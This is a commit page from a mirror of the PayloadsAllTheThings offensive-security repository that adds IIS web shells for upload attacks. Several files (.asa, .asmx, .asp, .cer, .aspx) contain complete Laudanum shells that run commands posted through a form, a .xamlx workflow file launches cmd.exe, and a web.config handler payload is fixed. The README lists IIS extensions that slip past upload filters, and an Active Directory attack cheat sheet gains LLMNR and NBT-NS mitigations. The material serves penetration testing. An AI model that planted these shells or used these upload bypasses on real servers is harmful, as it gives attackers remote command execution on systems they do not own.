Mirrors/PayloadsAllTheThings
6
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings synced 2024-06-25 16:39:02 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity

IIS asp shell with .asa, .cer, .xamlx

Browse Source
This commit is contained in:
Swissky 2019-11-16 14:53:42 +01:00
parent 639dc9faec
commit 00684a10cd
9 changed files with 547 additions and 40 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

106
Methodology and Resources/Active Directory Attack.md
View File

@ -2,44 +2,64 @@
## Summary
* [Tools](#tools)
* [Most common paths to AD compromise](#most-common-paths-to-ad-compromise)
* [MS14-068 (Microsoft Kerberos Checksum Validation Vulnerability)](#ms14-068-microsoft-kerberos-checksum-validation-vulnerability)
* [Open Shares](#open-shares)
* [SCF file attack against writeable share](#scf-file-attack-against-writeable-share)
* [GPO - Pivoting with Local Admin & Passwords in SYSVOL](#gpo---pivoting-with-local-admin--passwords-in-sysvol)
* [Dumping AD Domain Credentials](#dumping-ad-domain-credentials-systemrootntdsntdsdit)
* Using ndtsutil
* Using Vshadow
* Using vssadmin
* Using DiskShadow
* Using Mimikatz DCSync
* Using Mimikatz sekurlsa
* [Password spraying](#password-spraying)
* [Password in AD User comment](#password-in-ad-user-comment)
* [Pass-the-Ticket Golden Tickets](#pass-the-ticket-golden-tickets)
* [Pass-the-Ticket Silver Tickets](#pass-the-ticket-silver-tickets)
* [Kerberoasting](#kerberoasting)
* [KRB_AS_REP roasting](#krb_as_rep-roasting)
* [Pass-the-Hash](#pass-the-hash)
* [OverPass-the-Hash (pass the key)](#overpass-the-hash-pass-the-key)
* [Capturing and cracking NTLMv2 hashes](#capturing-and-cracking-ntlmv2-hashes)
* [NTLMv2 hashes relaying](#ntlmv2-hashes-relaying)
* [MS08-068 NTLM reflection](#ms08-068-ntlm-reflection)
* [SMB Signing Disabled and IPv4](#smb-signing-disabled-and-ipv4)
* [SMB Signing Disabled and IPv6](#smb-signing-disabled-and-ipv6)
* [Drop the MIC](#drop-the-mic)
* [Ghost Potato](#ghost-potato)
* [Dangerous Built-in Groups Usage](#dangerous-built-in-groups-usage)
* [Trust relationship between domains](#trust-relationship-between-domains)
* [Child Domain to Forest Compromise - SID Hijacking](#child-domain-to-forest-compromise---sid-hijacking)
* [Unconstrained delegation](#unconstrained-delegation)
* [Resource-Based Constrained Delegation](#resource-based-constrained-delegation)
* [Relay delegation with mitm6](#relay-delegation-with-mitm6)
* [PrivExchange attack](#privexchange-attack)
* [Extract accounts from /etc/krb5.keytab](#extract-accounts-from-etc-krb5-keytab)
* [PXE Boot image attack](#pxe-boot-image-attack)
* [Impersonating Office 365 Users on Azure AD Connect](#impersonating-office-365-users-on-azure-ad-connect)
- [Active Directory Attacks](#active-directory-attacks)
- [Summary](#summary)
- [Tools](#tools)
- [Most common paths to AD compromise](#most-common-paths-to-ad-compromise)
- [MS14-068 (Microsoft Kerberos Checksum Validation Vulnerability)](#ms14-068-microsoft-kerberos-checksum-validation-vulnerability)
- [Open Shares](#open-shares)
- [SCF and URL file attack against writeable share](#scf-and-url-file-attack-against-writeable-share)
- [GPO - Pivoting with Local Admin & Passwords in SYSVOL](#gpo---pivoting-with-local-admin--passwords-in-sysvol)
- [Dumping AD Domain Credentials (%SystemRoot%\NTDS\Ntds.dit)](#dumping-ad-domain-credentials-systemrootntdsntdsdit)
- [Using ndtsutil](#using-ndtsutil)
- [Using Vshadow](#using-vshadow)
- [Using vssadmin](#using-vssadmin)
- [Using DiskShadow (a Windows signed binary)](#using-diskshadow-a-windows-signed-binary)
- [Using esentutl.exe](#using-esentutlexe)
- [Extract hashes from ntds.dit](#extract-hashes-from-ntdsdit)
- [Alternatives - modules](#alternatives---modules)
- [Using Mimikatz DCSync](#using-mimikatz-dcsync)
- [Using Mimikatz sekurlsa](#using-mimikatz-sekurlsa)
- [Password spraying](#password-spraying)
- [Using `kerbrute`, a tool to perform Kerberos pre-auth bruteforcing.](#using-kerbrute-a-tool-to-perform-kerberos-pre-auth-bruteforcing)
- [Using `crackmapexec` and `mp64` to generate passwords and spray them against SMB services on the network.](#using-crackmapexec-and-mp64-to-generate-passwords-and-spray-them-against-smb-services-on-the-network)
- [Using RDPassSpray to target RDP services.](#using-rdpassspray-to-target-rdp-services)
- [Using [hydra]() and [ncrack]() to target RDP services.](#using-hydra-and-ncrack-to-target-rdp-services)
- [Password in AD User comment](#password-in-ad-user-comment)
- [Pass-the-Ticket Golden Tickets](#pass-the-ticket-golden-tickets)
- [Using Mimikatz](#using-mimikatz)
- [Using Meterpreter](#using-meterpreter)
- [Using a ticket on Linux](#using-a-ticket-on-linux)
- [Pass-the-Ticket Silver Tickets](#pass-the-ticket-silver-tickets)
- [Kerberoasting](#kerberoasting)
- [KRB_AS_REP Roasting](#krbasrep-roasting)
- [Pass-the-Hash](#pass-the-hash)
- [OverPass-the-Hash (pass the key)](#overpass-the-hash-pass-the-key)
- [Using impacket](#using-impacket)
- [Using Rubeus](#using-rubeus)
- [Capturing and cracking NTLMv2 hashes](#capturing-and-cracking-ntlmv2-hashes)
- [NTLMv2 hashes relaying](#ntlmv2-hashes-relaying)
- [MS08-068 NTLM reflection](#ms08-068-ntlm-reflection)
- [SMB Signing Disabled and IPv4](#smb-signing-disabled-and-ipv4)
- [SMB Signing Disabled and IPv6](#smb-signing-disabled-and-ipv6)
- [Drop the MIC](#drop-the-mic)
- [Ghost Potato - CVE-2019-1384](#ghost-potato---cve-2019-1384)
- [Dangerous Built-in Groups Usage](#dangerous-built-in-groups-usage)
- [Trust relationship between domains](#trust-relationship-between-domains)
- [Child Domain to Forest Compromise - SID Hijacking](#child-domain-to-forest-compromise---sid-hijacking)
- [Unconstrained delegation](#unconstrained-delegation)
- [Find delegation](#find-delegation)
- [Monitor with Rubeus](#monitor-with-rubeus)
- [Force a connect back from the DC](#force-a-connect-back-from-the-dc)
- [Load the ticket](#load-the-ticket)
- [Mitigation](#mitigation)
- [Resource-Based Constrained Delegation](#resource-based-constrained-delegation)
- [Relay delegation with mitm6](#relay-delegation-with-mitm6)
- [PrivExchange attack](#privexchange-attack)
- [Extract accounts from /etc/krb5.keytab](#extract-accounts-from-etckrb5keytab)
- [PXE Boot image attack](#pxe-boot-image-attack)
- [Impersonating Office 365 Users on Azure AD Connect](#impersonating-office-365-users-on-azure-ad-connect)
- [References](#references)
## Tools
@ -824,6 +844,16 @@ If a machine has `SMB signing`:`disabled`, it is possible to use Responder with
$ proxychains mssqlclient.py contoso/normaluser1@192.168.48.230 -windows-auth
```
Mitigations:
* Disable LLMNR via group policy
```powershell
Open gpedit.msc and navigate to Computer Configuration > Administrative Templates > Network > DNS Client > Turn off multicast name resolution and set to Enabled
```
* Disable NBT-NS
```powershell
This can be achieved by navigating through the GUI to Network card > Properties > IPv4 > Advanced > WINS and then under "NetBIOS setting" select Disable NetBIOS over TCP/IP
```
#### SMB Signing Disabled and IPv6

2
Upload Insecure Files/Configuration IIS web.config/web.config
View File

@ -2,7 +2,7 @@
<configuration>
<system.webServer>
<handlers accessPolicy="Read, Script, Write">
<add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64 />
<add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />
</handlers>
<security>
<requestFiltering>

83
Upload Insecure Files/Extension ASP/shell.asa Normal file
View File

@ -0,0 +1,83 @@
<%
' *******************************************************************************
' ***
' *** Laudanum Project
' *** A Collection of Injectable Files used during a Penetration Test
' ***
' *** More information is available at:
' *** http://laudanum.secureideas.net
' *** laudanum@secureideas.net
' ***
' *** Project Leads:
' *** Kevin Johnson <kjohnson@secureideas.net
' *** Tim Medin <tim@securitywhole.com>
' ***
' *** Copyright 2012 by Kevin Johnson and the Laudanum Team
' ***
' ********************************************************************************
' ***
' *** Updated and fixed by Robin Wood <Digininja>
' *** Updated and fixed by Tim Medin <tim@securitywhole.com
' ***
' ********************************************************************************
' *** This program is free software; you can redistribute it and/or
' *** modify it under the terms of the GNU General Public License
' *** as published by the Free Software Foundation; either version 2
' *** of the License, or (at your option) any later version.
' ***
' *** This program is distributed in the hope that it will be useful,
' *** but WITHOUT ANY WARRANTY; without even the implied warranty of
' *** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
' *** GNU General Public License for more details.
' ***
' *** You can get a copy of the GNU General Public License from this
' *** address: http://www.gnu.org/copyleft/gpl.html#SEC1
' *** You can also write to the Free Software Foundation, Inc., Temple
' *** Place - Suite Boston, MA USA.
' ***
' ***************************************************************************** */
' can set this to 0 for never time out but don't want to kill the server if a script
' goes into a loop for any reason
Server.ScriptTimeout = 180
ip=request.ServerVariables("REMOTE_ADDR")
if ip<>"1.2.3.4" then
response.Status="404 Page Not Found"
response.Write(response.Status)
response.End
end if
if Request.Form("submit") <> "" then
Dim wshell, intReturn, strPResult
cmd = Request.Form("cmd")
Response.Write ("Running command: " & cmd & "<br />")
set wshell = CreateObject("WScript.Shell")
Set objCmd = wShell.Exec(cmd)
strPResult = objCmd.StdOut.Readall()
response.write "<br><pre>" & replace(replace(strPResult,"<","&lt;"),vbCrLf,"<br>") & "</pre>"
set wshell = nothing
end if
%>
<html>
<head><title>Laundanum ASP Shell</title></head>
<body onload="document.shell.cmd.focus()">
<form action="shell.asp" method="POST" name="shell">
Command: <Input width="200" type="text" name="cmd" value="<%=cmd%>" /><br />
<input type="submit" name="submit" value="Submit" />
<p>Don't forget that if you want to shell command (not a specific executable) you need to call cmd.exe. It is usually located at C:\Windows\System32\cmd.exe, but to be safe just call %ComSpec%. Also, don't forget to use the /c switch so cmd.exe terminates when your command is done.
<p>Example command to do a directory listing:<br>
%ComSpec% /c dir
</form>
<hr/>
<address>
Copyright &copy; 2012, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
Written by Tim Medin.<br/>
Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.
</address>
</body>
</html>

83
Upload Insecure Files/Extension ASP/shell.asmx Normal file
View File

@ -0,0 +1,83 @@
<%
' *******************************************************************************
' ***
' *** Laudanum Project
' *** A Collection of Injectable Files used during a Penetration Test
' ***
' *** More information is available at:
' *** http://laudanum.secureideas.net
' *** laudanum@secureideas.net
' ***
' *** Project Leads:
' *** Kevin Johnson <kjohnson@secureideas.net
' *** Tim Medin <tim@securitywhole.com>
' ***
' *** Copyright 2012 by Kevin Johnson and the Laudanum Team
' ***
' ********************************************************************************
' ***
' *** Updated and fixed by Robin Wood <Digininja>
' *** Updated and fixed by Tim Medin <tim@securitywhole.com
' ***
' ********************************************************************************
' *** This program is free software; you can redistribute it and/or
' *** modify it under the terms of the GNU General Public License
' *** as published by the Free Software Foundation; either version 2
' *** of the License, or (at your option) any later version.
' ***
' *** This program is distributed in the hope that it will be useful,
' *** but WITHOUT ANY WARRANTY; without even the implied warranty of
' *** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
' *** GNU General Public License for more details.
' ***
' *** You can get a copy of the GNU General Public License from this
' *** address: http://www.gnu.org/copyleft/gpl.html#SEC1
' *** You can also write to the Free Software Foundation, Inc., Temple
' *** Place - Suite Boston, MA USA.
' ***
' ***************************************************************************** */
' can set this to 0 for never time out but don't want to kill the server if a script
' goes into a loop for any reason
Server.ScriptTimeout = 180
ip=request.ServerVariables("REMOTE_ADDR")
if ip<>"1.2.3.4" then
response.Status="404 Page Not Found"
response.Write(response.Status)
response.End
end if
if Request.Form("submit") <> "" then
Dim wshell, intReturn, strPResult
cmd = Request.Form("cmd")
Response.Write ("Running command: " & cmd & "<br />")
set wshell = CreateObject("WScript.Shell")
Set objCmd = wShell.Exec(cmd)
strPResult = objCmd.StdOut.Readall()
response.write "<br><pre>" & replace(replace(strPResult,"<","&lt;"),vbCrLf,"<br>") & "</pre>"
set wshell = nothing
end if
%>
<html>
<head><title>Laundanum ASP Shell</title></head>
<body onload="document.shell.cmd.focus()">
<form action="shell.asp" method="POST" name="shell">
Command: <Input width="200" type="text" name="cmd" value="<%=cmd%>" /><br />
<input type="submit" name="submit" value="Submit" />
<p>Don't forget that if you want to shell command (not a specific executable) you need to call cmd.exe. It is usually located at C:\Windows\System32\cmd.exe, but to be safe just call %ComSpec%. Also, don't forget to use the /c switch so cmd.exe terminates when your command is done.
<p>Example command to do a directory listing:<br>
%ComSpec% /c dir
</form>
<hr/>
<address>
Copyright &copy; 2012, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
Written by Tim Medin.<br/>
Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.
</address>
</body>
</html>

83
Upload Insecure Files/Extension ASP/shell.asp Normal file
View File

@ -0,0 +1,83 @@
<%
' *******************************************************************************
' ***
' *** Laudanum Project
' *** A Collection of Injectable Files used during a Penetration Test
' ***
' *** More information is available at:
' *** http://laudanum.secureideas.net
' *** laudanum@secureideas.net
' ***
' *** Project Leads:
' *** Kevin Johnson <kjohnson@secureideas.net
' *** Tim Medin <tim@securitywhole.com>
' ***
' *** Copyright 2012 by Kevin Johnson and the Laudanum Team
' ***
' ********************************************************************************
' ***
' *** Updated and fixed by Robin Wood <Digininja>
' *** Updated and fixed by Tim Medin <tim@securitywhole.com
' ***
' ********************************************************************************
' *** This program is free software; you can redistribute it and/or
' *** modify it under the terms of the GNU General Public License
' *** as published by the Free Software Foundation; either version 2
' *** of the License, or (at your option) any later version.
' ***
' *** This program is distributed in the hope that it will be useful,
' *** but WITHOUT ANY WARRANTY; without even the implied warranty of
' *** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
' *** GNU General Public License for more details.
' ***
' *** You can get a copy of the GNU General Public License from this
' *** address: http://www.gnu.org/copyleft/gpl.html#SEC1
' *** You can also write to the Free Software Foundation, Inc., Temple
' *** Place - Suite Boston, MA USA.
' ***
' ***************************************************************************** */
' can set this to 0 for never time out but don't want to kill the server if a script
' goes into a loop for any reason
Server.ScriptTimeout = 180
ip=request.ServerVariables("REMOTE_ADDR")
if ip<>"1.2.3.4" then
response.Status="404 Page Not Found"
response.Write(response.Status)
response.End
end if
if Request.Form("submit") <> "" then
Dim wshell, intReturn, strPResult
cmd = Request.Form("cmd")
Response.Write ("Running command: " & cmd & "<br />")
set wshell = CreateObject("WScript.Shell")
Set objCmd = wShell.Exec(cmd)
strPResult = objCmd.StdOut.Readall()
response.write "<br><pre>" & replace(replace(strPResult,"<","&lt;"),vbCrLf,"<br>") & "</pre>"
set wshell = nothing
end if
%>
<html>
<head><title>Laundanum ASP Shell</title></head>
<body onload="document.shell.cmd.focus()">
<form action="shell.asp" method="POST" name="shell">
Command: <Input width="200" type="text" name="cmd" value="<%=cmd%>" /><br />
<input type="submit" name="submit" value="Submit" />
<p>Don't forget that if you want to shell command (not a specific executable) you need to call cmd.exe. It is usually located at C:\Windows\System32\cmd.exe, but to be safe just call %ComSpec%. Also, don't forget to use the /c switch so cmd.exe terminates when your command is done.
<p>Example command to do a directory listing:<br>
%ComSpec% /c dir
</form>
<hr/>
<address>
Copyright &copy; 2012, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
Written by Tim Medin.<br/>
Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.
</address>
</body>
</html>

129
Upload Insecure Files/Extension ASP/shell.aspx Normal file
View File

@ -0,0 +1,129 @@
<%@ Page Language="C#"%>
<%@ Import Namespace="System" %>
<script runat="server">
/* *****************************************************************************
***
*** Laudanum Project
*** A Collection of Injectable Files used during a Penetration Test
***
*** More information is available at:
*** http://laudanum.secureideas.net
*** laudanum@secureideas.net
***
*** Project Leads:
*** Kevin Johnson <kjohnson@secureideas.net>
*** Tim Medin <tim@securitywhole.com>
***
*** Copyright 2012 by Kevin Johnson and the Laudanum Team
***
********************************************************************************
***
*** This file provides shell access to the system.
***
********************************************************************************
*** This program is free software; you can redistribute it and/or
*** modify it under the terms of the GNU General Public License
*** as published by the Free Software Foundation; either version 2
*** of the License, or (at your option) any later version.
***
*** This program is distributed in the hope that it will be useful,
*** but WITHOUT ANY WARRANTY; without even the implied warranty of
*** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
*** GNU General Public License for more details.
***
*** You can get a copy of the GNU General Public License from this
*** address: http://www.gnu.org/copyleft/gpl.html#SEC1
*** You can also write to the Free Software Foundation, Inc., 59 Temple
*** Place - Suite 330, Boston, MA 02111-1307, USA.
***
***************************************************************************** */
string stdout = "";
string stderr = "";
void die() {
//HttpContext.Current.Response.Clear();
HttpContext.Current.Response.StatusCode = 404;
HttpContext.Current.Response.StatusDescription = "Not Found";
HttpContext.Current.Response.Write("<h1>404 Not Found</h1>");
HttpContext.Current.Server.ClearError();
HttpContext.Current.Response.End();
}
void Page_Load(object sender, System.EventArgs e) {
// Check for an IP in the range we want
string[] allowedIps = new string[] {"::1","192.168.0.1", "127.0.0.1"};
// check if the X-Fordarded-For header exits
string remoteIp;
if (HttpContext.Current.Request.Headers["X-Forwarded-For"] == null) {
remoteIp = Request.UserHostAddress;
} else {
remoteIp = HttpContext.Current.Request.Headers["X-Forwarded-For"].Split(new char[] { ',' })[0];
}
bool validIp = false;
foreach (string ip in allowedIps) {
validIp = (validIp || (remoteIp == ip));
}
if (!validIp) {
die();
}
if (Request.Form["c"] != null) {
// do or do not, there is no try
//try {
// create the ProcessStartInfo using "cmd" as the program to be run, and "/c " as the parameters.
// "/c" tells cmd that we want it to execute the command that follows, and exit.
System.Diagnostics.ProcessStartInfo procStartInfo = new System.Diagnostics.ProcessStartInfo("cmd", "/c " + Request.Form["c"]);
// The following commands are needed to redirect the standard output and standard error.
procStartInfo.RedirectStandardOutput = true;
procStartInfo.RedirectStandardError = true;
procStartInfo.UseShellExecute = false;
// Do not create the black window.
procStartInfo.CreateNoWindow = true;
// Now we create a process, assign its ProcessStartInfo and start it
System.Diagnostics.Process p = new System.Diagnostics.Process();
p.StartInfo = procStartInfo;
p.Start();
// Get the output and error into a string
stdout = p.StandardOutput.ReadToEnd();
stderr = p.StandardError.ReadToEnd();
//}
//catch (Exception objException)
//{
}
}
</script>
<html>
<head><title>Laundanum ASPX Shell</title></head>
<body onload="document.shell.c.focus()">
<form method="post" name="shell">
cmd /c <input type="text" name="c"/>
<input type="submit"><br/>
STDOUT:<br/>
<pre><% = stdout.Replace("<", "&lt;") %></pre>
<br/>
<br/>
<br/>
STDERR:<br/>
<pre><% = stderr.Replace("<", "&lt;") %></pre>
</form>
<hr/>
<address>
Copyright &copy; 2012, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
Written by Tim Medin.<br/>
Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.
</address>
</body>
</html>

83
Upload Insecure Files/Extension ASP/shell.cer Normal file
View File

@ -0,0 +1,83 @@
<%
' *******************************************************************************
' ***
' *** Laudanum Project
' *** A Collection of Injectable Files used during a Penetration Test
' ***
' *** More information is available at:
' *** http://laudanum.secureideas.net
' *** laudanum@secureideas.net
' ***
' *** Project Leads:
' *** Kevin Johnson <kjohnson@secureideas.net
' *** Tim Medin <tim@securitywhole.com>
' ***
' *** Copyright 2012 by Kevin Johnson and the Laudanum Team
' ***
' ********************************************************************************
' ***
' *** Updated and fixed by Robin Wood <Digininja>
' *** Updated and fixed by Tim Medin <tim@securitywhole.com
' ***
' ********************************************************************************
' *** This program is free software; you can redistribute it and/or
' *** modify it under the terms of the GNU General Public License
' *** as published by the Free Software Foundation; either version 2
' *** of the License, or (at your option) any later version.
' ***
' *** This program is distributed in the hope that it will be useful,
' *** but WITHOUT ANY WARRANTY; without even the implied warranty of
' *** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
' *** GNU General Public License for more details.
' ***
' *** You can get a copy of the GNU General Public License from this
' *** address: http://www.gnu.org/copyleft/gpl.html#SEC1
' *** You can also write to the Free Software Foundation, Inc., Temple
' *** Place - Suite Boston, MA USA.
' ***
' ***************************************************************************** */
' can set this to 0 for never time out but don't want to kill the server if a script
' goes into a loop for any reason
Server.ScriptTimeout = 180
ip=request.ServerVariables("REMOTE_ADDR")
if ip<>"1.2.3.4" then
response.Status="404 Page Not Found"
response.Write(response.Status)
response.End
end if
if Request.Form("submit") <> "" then
Dim wshell, intReturn, strPResult
cmd = Request.Form("cmd")
Response.Write ("Running command: " & cmd & "<br />")
set wshell = CreateObject("WScript.Shell")
Set objCmd = wShell.Exec(cmd)
strPResult = objCmd.StdOut.Readall()
response.write "<br><pre>" & replace(replace(strPResult,"<","&lt;"),vbCrLf,"<br>") & "</pre>"
set wshell = nothing
end if
%>
<html>
<head><title>Laundanum ASP Shell</title></head>
<body onload="document.shell.cmd.focus()">
<form action="shell.asp" method="POST" name="shell">
Command: <Input width="200" type="text" name="cmd" value="<%=cmd%>" /><br />
<input type="submit" name="submit" value="Submit" />
<p>Don't forget that if you want to shell command (not a specific executable) you need to call cmd.exe. It is usually located at C:\Windows\System32\cmd.exe, but to be safe just call %ComSpec%. Also, don't forget to use the /c switch so cmd.exe terminates when your command is done.
<p>Example command to do a directory listing:<br>
%ComSpec% /c dir
</form>
<hr/>
<address>
Copyright &copy; 2012, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
Written by Tim Medin.<br/>
Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.
</address>
</body>
</html>

16
Upload Insecure Files/Extension ASP/shell.xamlx Normal file
View File

@ -0,0 +1,16 @@
<WorkflowService ConfigurationName="Service1" Name="Service1" xmlns="http://schemas.microsoft.com/netfx/2009/xaml/servicemodel" xmlns:p="http://schemas.microsoft.com/netfx/2009/xaml/activities" xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml" xmlns:p1="http://schemas.microsoft.com/netfx/2009/xaml/activities" >
<p:Sequence DisplayName="Sequential Service">
<TransactedReceiveScope Request="{x:Reference __r0}">
<p1:Sequence >
<SendReply DisplayName="SendResponse" >
<SendReply.Request>
<Receive x:Name="__r0" CanCreateInstance="True" OperationName="SubmitPurchasingProposal" Action="testme" />
</SendReply.Request>
<SendMessageContent>
<p1:InArgument x:TypeArguments="x:String">[System.Diagnostics.Process.Start("cmd.exe", "/c calc").toString()]</p1:InArgument>
</SendMessageContent>
</SendReply>
</p1:Sequence>
</TransactedReceiveScope>
</p:Sequence>
</WorkflowService>

2
Upload Insecure Files/README.md
View File

@ -46,7 +46,7 @@ Double extensions
### Other extensions
```powershell
asp : .asp, .aspx
asp : .asp, .aspx, .cer and .asa (IIS <= 7.5), shell.aspx;1.jpg (IIS < 7.0)
perl: .pl, .pm, .cgi, .lib
jsp : .jsp, .jspx, .jsw, .jsv, .jspf
Coldfusion: .cfm, .cfml, .cfc, .dbm